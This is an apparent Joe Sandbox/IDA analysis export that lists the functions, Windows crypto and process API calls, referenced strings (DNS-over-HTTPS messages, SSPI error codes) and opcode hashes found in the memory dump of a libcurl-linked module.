                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: curl_multi_remove_handlecurl_mvsnprintf
                                                                                                                                            • String ID: %s$%s%02x%02x$AAAA$CNAME: %s$Could not DOH-resolve: %s$DOH A: %u.%u.%u.%u$DOH AAAA: $DOH Host name: %s$DOH: %s type %s for %s$TTL: %u seconds$bad error code
                                                                                                                                            • API String ID: 262101408-4053692942
                                                                                                                                            • Opcode ID: f047e899ebe68cf14d5bcf1bd199dbb5635843b5f67751cf52a24de6c42354a4
                                                                                                                                            • Instruction ID: f4f4e37cd845f72a3a3c5d95f6c25c255b0b91b42431658c1bb2482b4cf55bbc
                                                                                                                                            • Opcode Fuzzy Hash: f047e899ebe68cf14d5bcf1bd199dbb5635843b5f67751cf52a24de6c42354a4
                                                                                                                                            • Instruction Fuzzy Hash: 09F19271D402289FDB219F24EE89BAEB7B5FF49304F0441E9F84CA7241D7399A859F90
                                                                                                                                            Function 6B777730 Relevance: 12.9, Strings: 10, Instructions: 382COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: alnum$alpha$blank$digit$graph$lower$print$space$upper$xdigit
                                                                                                                                            • API String ID: 0-2602438971
                                                                                                                                            • Opcode ID: e90f01775548c97afae6e5042e99acf70790fe39a246e88001e060a31b738349
                                                                                                                                            • Instruction ID: 39969ec35e859e909a297819239fdd86a7e2ec0a6b6611bdd4d50bfd04984a62
                                                                                                                                            • Opcode Fuzzy Hash: e90f01775548c97afae6e5042e99acf70790fe39a246e88001e060a31b738349
                                                                                                                                            • Instruction Fuzzy Hash: 9FC1F421B0C1894ACB11AF7886A27FE7BB3DF56348F5904F9E885CB202D61B9908C751
                                                                                                                                            Function 6B7920A0 Relevance: 10.6, APIs: 7, Instructions: 60encryptionCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000040), ref: 6B7920C3
                                                                                                                                            • CryptCreateHash.ADVAPI32(00000000,00008002,00000000,00000000,00000000), ref: 6B7920DD
                                                                                                                                            • CryptHashData.ADVAPI32(00000000,00000000,00000000,00000000), ref: 6B7920F7
                                                                                                                                            • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 6B792111
                                                                                                                                            • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000010,00000000), ref: 6B79212B
                                                                                                                                            • CryptDestroyHash.ADVAPI32(00000000), ref: 6B792139
                                                                                                                                            • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 6B792149
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Crypt$Hash$ContextParam$AcquireCreateDataDestroyRelease
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3606780921-0
                                                                                                                                            • Opcode ID: 38f87ebaa4411eaa062126b54c2728bc257df22c4a333980191d1cbed8eda9c1
                                                                                                                                            • Instruction ID: fd2c4a4a325bc2b82be26a364ce839581050a1d0cac0724c2854e388d9d106b8
                                                                                                                                            • Opcode Fuzzy Hash: 38f87ebaa4411eaa062126b54c2728bc257df22c4a333980191d1cbed8eda9c1
                                                                                                                                            • Instruction Fuzzy Hash: 6F113070A40208BBEF209F90DD4AF9D7B78EB44B40F1044A0FA24F52D0E775EA14DB24
                                                                                                                                            Function 6B778010 Relevance: 9.1, APIs: 6, Instructions: 118encryptionCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000040,?), ref: 6B77803A
                                                                                                                                            • CryptImportKey.ADVAPI32(?,00000208,00000014,00000000,00000000,?,?,?), ref: 6B7780E9
                                                                                                                                            • CryptReleaseContext.ADVAPI32(?,00000000,?), ref: 6B7780F8
                                                                                                                                            • CryptEncrypt.ADVAPI32(?,00000000,00000000,00000000,?,00000008,00000008,?), ref: 6B77812D
                                                                                                                                            • CryptDestroyKey.ADVAPI32(?), ref: 6B778136
                                                                                                                                            • CryptReleaseContext.ADVAPI32(?,00000000), ref: 6B778141
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Crypt$Context$Release$AcquireDestroyEncryptImport
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3016261861-0
                                                                                                                                            • Opcode ID: e45065251a2aa33368eba0b573b4dadaa74b0afc86886db1ff81a3d520601ce2
                                                                                                                                            • Instruction ID: 4011848f88d2ea10c9a23c69c471ff25b3cf90ed66611ca24b064a95cd64a3cd
                                                                                                                                            • Opcode Fuzzy Hash: e45065251a2aa33368eba0b573b4dadaa74b0afc86886db1ff81a3d520601ce2
                                                                                                                                            • Instruction Fuzzy Hash: 8541B435900249AFEF11CFA8C946BEEBFB5EF0B740F1050A9E564A7381C736650ADB64
                                                                                                                                            Function 6B79A790 Relevance: 8.0, Strings: 6, Instructions: 501COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: %02d:%02d%n$%02d:%02d:%02d%n$%31[ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz]$+$<$GMT
                                                                                                                                            • API String ID: 0-3646017816
                                                                                                                                            • Opcode ID: 7d17cc056e2e83325df3c5d1306cf4e999c9d796447c9fb94459eeff3fe329ed
                                                                                                                                            • Instruction ID: 2798459f2b7fe4d940c950bdbd3df68d56df0ea2f602308d094fc1c9a0e216f9
                                                                                                                                            • Opcode Fuzzy Hash: 7d17cc056e2e83325df3c5d1306cf4e999c9d796447c9fb94459eeff3fe329ed
                                                                                                                                            • Instruction Fuzzy Hash: AF02A271E052089BCF18DEBCFA516DDB7B6AF89324F15427AF825EB280D73899418B50
                                                                                                                                            Function 6B7CEFE1 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 6B7CF0D9
                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 6B7CF0E3
                                                                                                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 6B7CF0F0
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3906539128-0
                                                                                                                                            • Opcode ID: 1317178b319e5f78f4dfe70fa11581b9f4b3f7d68e4fce4ea37f94376fc0c537
                                                                                                                                            • Instruction ID: 74facc68c4bf506a754b41c05b39bf34c60ffa108efa57fac5b77a03ad56cb9e
                                                                                                                                            • Opcode Fuzzy Hash: 1317178b319e5f78f4dfe70fa11581b9f4b3f7d68e4fce4ea37f94376fc0c537
                                                                                                                                            • Instruction Fuzzy Hash: 3F31E47491122CABCB21DF24D9897CDBBB8BF08350F5045EAF41CA7290EB349B858F45
                                                                                                                                            Function 6B7CC43E Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetCurrentProcess.KERNEL32(?,?,6B7CC43D,?,00000000,?,?,?,6B7C84AA), ref: 6B7CC460
                                                                                                                                            • TerminateProcess.KERNEL32(00000000,?,6B7CC43D,?,00000000,?,?,?,6B7C84AA), ref: 6B7CC467
                                                                                                                                            • ExitProcess.KERNEL32 ref: 6B7CC479
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Process$CurrentExitTerminate
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1703294689-0
                                                                                                                                            • Opcode ID: 5024e18e061b8c14a66ef699e08e88bf7f1b9ff734afe688fd93f11e9d9cb9b6
                                                                                                                                            • Instruction ID: 165d6e3de0eaa7f647953dd0893fa6d128bce060990de4e6a2096c7d80db6084
                                                                                                                                            • Opcode Fuzzy Hash: 5024e18e061b8c14a66ef699e08e88bf7f1b9ff734afe688fd93f11e9d9cb9b6
                                                                                                                                            • Instruction Fuzzy Hash: B6E0EC71000108AFCF016F74CA4DF5D3F69FB86B82F008468F82986221CB3AEA81DB81
                                                                                                                                            Function 6B791170 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 218COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • curl_msnprintf.LIBCURL(?,00000005,%lx,00000000,?,?), ref: 6B7912F9
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: curl_msnprintf
                                                                                                                                            • String ID: %lx
                                                                                                                                            • API String ID: 1809024409-1448181948
                                                                                                                                            • Opcode ID: 94f6991b8264f5dd825f12104431da24e7e699780e03d8362312f20764436fab
                                                                                                                                            • Instruction ID: b22521d634a9d44190587d08f803497c85ed521bd5ee69259e41fd37bf9df127
                                                                                                                                            • Opcode Fuzzy Hash: 94f6991b8264f5dd825f12104431da24e7e699780e03d8362312f20764436fab
                                                                                                                                            • Instruction Fuzzy Hash: 4D712A31F002659BCB10EE7CE6802ADB7B5EF86324F1543B9E469DBAC4E7385659C780
                                                                                                                                            Function 6B7CBCF0 Relevance: 1.8, APIs: 1, Instructions: 274COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?), ref: 6B7CBF1D
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ExceptionRaise
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3997070919-0
                                                                                                                                            • Opcode ID: 97093f4cf184391879ef45e48a10c5676de72db23d3a241b0720890b777082a0
                                                                                                                                            • Instruction ID: 210334d69cc3101cdb9b6a0226f713ebd439797b0f87f3d1dbea27e4ec2452a9
                                                                                                                                            • Opcode Fuzzy Hash: 97093f4cf184391879ef45e48a10c5676de72db23d3a241b0720890b777082a0
                                                                                                                                            • Instruction Fuzzy Hash: F8B1F3356106088FD715CF28C586B5A7BA0FF45364F2586ACF9A9CF3A1C339E992CB41
                                                                                                                                            Function 6B7CFBD1 Relevance: 1.3, Strings: 1, Instructions: 23COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: GetSystemTimePreciseAsFileTime
                                                                                                                                            • API String ID: 0-595813830
                                                                                                                                            • Opcode ID: 9bc59c534248d75f6359aed3808cf8b20ee6cb0e918afda434db10fd63a69fc3
                                                                                                                                            • Instruction ID: 984e1ae223f74504ed4043a6a6e093f5b32f75fec0599e88868ad07f6dce1dbe
                                                                                                                                            • Opcode Fuzzy Hash: 9bc59c534248d75f6359aed3808cf8b20ee6cb0e918afda434db10fd63a69fc3
                                                                                                                                            • Instruction Fuzzy Hash: 08E02B3368062877C71021D15E04FAE7B14CFA07F2F000272FE285D6808A2E9A53C2F1
                                                                                                                                            Function 6B777380 Relevance: .0, Instructions: 42COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 9c68a8d4a0846ebc4b09b0a145e38f1195cbc43887bcb385cbd8187a09426d5f
                                                                                                                                            • Instruction ID: 5626529f64cf01f0962682100c74bc58511cd388f4e6d021444fbffad888c3eb
                                                                                                                                            • Opcode Fuzzy Hash: 9c68a8d4a0846ebc4b09b0a145e38f1195cbc43887bcb385cbd8187a09426d5f
                                                                                                                                            • Instruction Fuzzy Hash: 54F0BE2210292007EF12682D60C1AF3A78BCBE6928AA260B1988C479D2865F740FD6E4
                                                                                                                                            Function 6B7D1C01 Relevance: .0, Instructions: 22COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: f24c9c46262d23ec0b753b88de3e3c1e445ebfc2cafafc896c0ae8289ab2ec2b
                                                                                                                                            • Instruction ID: e1587df0086511f4825879841b979917a642cbf74870ab068f18b7ce7ca0dd23
                                                                                                                                            • Opcode Fuzzy Hash: f24c9c46262d23ec0b753b88de3e3c1e445ebfc2cafafc896c0ae8289ab2ec2b
                                                                                                                                            • Instruction Fuzzy Hash: E9E08C72911238EBCB10CB99CA48A9AF3FCEB44B40B5144EBF515D3540E274DE00C7D0
                                                                                                                                            Function 6B7A9A80 Relevance: 161.3, APIs: 7, Strings: 85, Instructions: 272COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetLastError.KERNEL32(6B7A8609,00000000,6B7A7A04), ref: 6B7A9A9F
                                                                                                                                            Strings
                                                                                                                                            • SEC_E_CANNOT_INSTALL, xrefs: 6B7A9B22
                                                                                                                                            • SEC_I_SIGNATURE_NEEDED, xrefs: 6B7A9E6F
                                                                                                                                            • SEC_I_COMPLETE_NEEDED, xrefs: 6B7A9E45
                                                                                                                                            • SEC_E_NO_PA_DATA, xrefs: 6B7A9CA8
                                                                                                                                            • SEC_E_NO_IMPERSONATION, xrefs: 6B7A9C8A
                                                                                                                                            • SEC_E_UNTRUSTED_ROOT, xrefs: 6B7A9D98
                                                                                                                                            • SEC_E_WRONG_CREDENTIAL_HANDLE, xrefs: 6B7A9DA2
                                                                                                                                            • SEC_E_SECURITY_QOS_FAILED, xrefs: 6B7A9D16
                                                                                                                                            • SEC_E_MULTIPLE_ACCOUNTS, xrefs: 6B7A9C58
                                                                                                                                            • SEC_E_BUFFER_TOO_SMALL, xrefs: 6B7A9B18
                                                                                                                                            • SEC_E_DELEGATION_POLICY, xrefs: 6B7A9B7C
                                                                                                                                            • SEC_E_NO_AUTHENTICATING_AUTHORITY, xrefs: 6B7A9C76
                                                                                                                                            • SEC_I_CONTEXT_EXPIRED, xrefs: 6B7A9E4C
                                                                                                                                            • SEC_E_INTERNAL_ERROR, xrefs: 6B7A9BCC
                                                                                                                                            • SEC_E_PKINIT_NAME_MISMATCH, xrefs: 6B7A9CDA
                                                                                                                                            • SEC_E_OUT_OF_SEQUENCE, xrefs: 6B7A9CC6
                                                                                                                                            • SEC_E_INCOMPLETE_CREDENTIALS, xrefs: 6B7A9BAE
                                                                                                                                            • SEC_E_CERT_UNKNOWN, xrefs: 6B7A9B40
                                                                                                                                            • Unknown error, xrefs: 6B7A9E76
                                                                                                                                            • SEC_E_DECRYPT_FAILURE, xrefs: 6B7A9B72
                                                                                                                                            • SEC_I_INCOMPLETE_CREDENTIALS, xrefs: 6B7A9E53
                                                                                                                                            • SEC_E_KDC_INVALID_REQUEST, xrefs: 6B7A9C1C
                                                                                                                                            • CRYPT_E_REVOKED, xrefs: 6B7A9DB6
                                                                                                                                            • %s - %s, xrefs: 6B7A9DF5
                                                                                                                                            • SEC_E_NOT_OWNER, xrefs: 6B7A9C6C
                                                                                                                                            • SEC_I_RENEGOTIATE, xrefs: 6B7A9E68
                                                                                                                                            • SEC_E_CERT_EXPIRED, xrefs: 6B7A9B36
                                                                                                                                            • SEC_I_COMPLETE_AND_CONTINUE, xrefs: 6B7A9E3E
                                                                                                                                            • SEC_E_UNFINISHED_CONTEXT_DELETED, xrefs: 6B7A9D70
                                                                                                                                            • SEC_E_KDC_CERT_EXPIRED, xrefs: 6B7A9C08
                                                                                                                                            • SEC_E_DELEGATION_REQUIRED, xrefs: 6B7A9B86
                                                                                                                                            • SEC_E_TOO_MANY_PRINCIPALS, xrefs: 6B7A9D66
                                                                                                                                            • SEC_E_SMARTCARD_CERT_REVOKED, xrefs: 6B7A9D34
                                                                                                                                            • SEC_E_WRONG_PRINCIPAL, xrefs: 6B7A9DAC
                                                                                                                                            • SEC_E_ALGORITHM_MISMATCH, xrefs: 6B7A9AFA
                                                                                                                                            • SEC_I_CONTINUE_NEEDED, xrefs: 6B7A9DBC, 6B7A9E1E
                                                                                                                                            • SEC_E_UNKNOWN_CREDENTIALS, xrefs: 6B7A9D7A
                                                                                                                                            • SEC_E_PKINIT_CLIENT_FAILURE, xrefs: 6B7A9CD0
                                                                                                                                            • SEC_E_CONTEXT_EXPIRED, xrefs: 6B7A9B54
                                                                                                                                            • SEC_E_POLICY_NLTM_ONLY, xrefs: 6B7A9CE4
                                                                                                                                            • SEC_E_REVOCATION_OFFLINE_C, xrefs: 6B7A9CF8
                                                                                                                                            • SEC_E_KDC_UNABLE_TO_REFER, xrefs: 6B7A9C26
                                                                                                                                            • SEC_E_KDC_UNKNOWN_ETYPE, xrefs: 6B7A9C30
                                                                                                                                            • SEC_E_STRONG_CRYPTO_NOT_SUPPORTED, xrefs: 6B7A9D48
                                                                                                                                            • SEC_E_ENCRYPT_FAILURE, xrefs: 6B7A9B9A
                                                                                                                                            • SEC_E_TIME_SKEW, xrefs: 6B7A9D5C
                                                                                                                                            • SEC_E_KDC_CERT_REVOKED, xrefs: 6B7A9C12
                                                                                                                                            • SEC_E_CERT_WRONG_USAGE, xrefs: 6B7A9B4A
                                                                                                                                            • SEC_E_NO_CREDENTIALS, xrefs: 6B7A9C80
                                                                                                                                            • SEC_E_SECPKG_NOT_FOUND, xrefs: 6B7A9D0C
                                                                                                                                            • SEC_E_UNSUPPORTED_FUNCTION, xrefs: 6B7A9D84
                                                                                                                                            • SEC_E_INCOMPLETE_MESSAGE, xrefs: 6B7A9BB8
                                                                                                                                            • SEC_E_QOP_NOT_SUPPORTED, xrefs: 6B7A9CEE
                                                                                                                                            • SEC_E_BAD_PKGID, xrefs: 6B7A9B0E
                                                                                                                                            • SEC_E_ISSUING_CA_UNTRUSTED_KDC, xrefs: 6B7A9BFE
                                                                                                                                            • SEC_E_BAD_BINDINGS, xrefs: 6B7A9B04
                                                                                                                                            • SEC_E_SMARTCARD_LOGON_REQUIRED, xrefs: 6B7A9D3E
                                                                                                                                            • SEC_E_MAX_REFERRALS_EXCEEDED, xrefs: 6B7A9C44
                                                                                                                                            • SEC_E_CROSSREALM_DELEGATION_FAILURE, xrefs: 6B7A9B5E
                                                                                                                                            • SEC_E_SMARTCARD_CERT_EXPIRED, xrefs: 6B7A9D2A
                                                                                                                                            • SEC_E_REVOCATION_OFFLINE_KDC, xrefs: 6B7A9D02
                                                                                                                                            • %s (0x%08X), xrefs: 6B7A9DBD
                                                                                                                                            • SEC_E_NO_KERB_KEY, xrefs: 6B7A9C9E
                                                                                                                                            • SEC_E_ISSUING_CA_UNTRUSTED, xrefs: 6B7A9BF4
                                                                                                                                            • SEC_E_NO_S4U_PROT_SUPPORT, xrefs: 6B7A9CB2
                                                                                                                                            • SEC_E_SHUTDOWN_IN_PROGRESS, xrefs: 6B7A9D20
                                                                                                                                            • SEC_I_LOCAL_LOGON, xrefs: 6B7A9E5A
                                                                                                                                            • SEC_E_MESSAGE_ALTERED, xrefs: 6B7A9C4E
                                                                                                                                            • SEC_E_INVALID_PARAMETER, xrefs: 6B7A9BE0
                                                                                                                                            • SEC_E_CANNOT_PACK, xrefs: 6B7A9B2C
                                                                                                                                            • SEC_E_MUST_BE_KDC, xrefs: 6B7A9C62
                                                                                                                                            • SEC_I_NO_LSA_CONTEXT, xrefs: 6B7A9E61
                                                                                                                                            • SEC_E_INVALID_TOKEN, xrefs: 6B7A9BEA
                                                                                                                                            • SEC_E_INVALID_HANDLE, xrefs: 6B7A9BD6
                                                                                                                                            • SEC_E_LOGON_DENIED, xrefs: 6B7A9C3A
                                                                                                                                            • SEC_E_DOWNGRADE_DETECTED, xrefs: 6B7A9B90
                                                                                                                                            • SEC_E_INSUFFICIENT_MEMORY, xrefs: 6B7A9BC2
                                                                                                                                            • SEC_E_TARGET_UNKNOWN, xrefs: 6B7A9D52
                                                                                                                                            • SEC_E_ILLEGAL_MESSAGE (0x%08X) - This error usually occurs when a fatal SSL/TLS alert is received (e.g. handshake failed). More detail may be available in the Windows System event log., xrefs: 6B7A9E88
                                                                                                                                            • SEC_E_UNSUPPORTED_PREAUTH, xrefs: 6B7A9D8E
                                                                                                                                            • SEC_E_NO_IP_ADDRESSES, xrefs: 6B7A9C94
                                                                                                                                            • SEC_E_CRYPTO_SYSTEM_INVALID, xrefs: 6B7A9B68
                                                                                                                                            • SEC_E_ILLEGAL_MESSAGE, xrefs: 6B7A9BA4
                                                                                                                                            • SEC_E_NO_TGT_REPLY, xrefs: 6B7A9CBC
                                                                                                                                            • No error, xrefs: 6B7A9E17
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmpDownload File
